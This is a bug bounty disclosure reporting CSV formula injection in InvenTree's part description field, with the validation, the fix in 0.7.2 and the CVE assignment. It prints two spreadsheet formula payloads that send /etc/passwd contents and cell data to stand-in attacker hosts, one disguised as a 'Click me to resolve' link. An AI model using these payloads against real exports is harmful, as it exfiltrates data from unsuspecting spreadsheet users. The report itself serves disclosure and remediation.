Formula Injection Part Description in inventree/inventree

Valid

Reported on

Jun 11th 2022

Description

Formula Injection/CSV Injection in inventree due to Improper Neutralization of Formula Elements in CSV File.

Proof of Concept

Video PoC link: https://drive.google.com/file/d/1mf_BTUDS1iZ4uJfBpc56_8WgpdZdN5_f/view?usp=sharing

Impact

Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data. On constructing the payloads as

=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1));
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")

An attacker can have access to /etc/passwd system file

Occurrences

References

We are processing your report and will contact the inventree team within 24 hours. a year ago
Oliver validated this vulnerability a year ago

Thanks for reporting this, we were not aware of this vulnerability. It will be remedied ASAP

saharshtapi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver marked this as fixed in 0.7.2 with commit 26bf51 a year ago
Oliver has been awarded the fix bounty
This vulnerability will not receive a CVE
api.py#L883 has been validated
saharshtapi
a year ago

Researcher

@admin Can you assign CVE?

Jamie Slome
a year ago

Admin

CVE assigned 👏

to join this conversation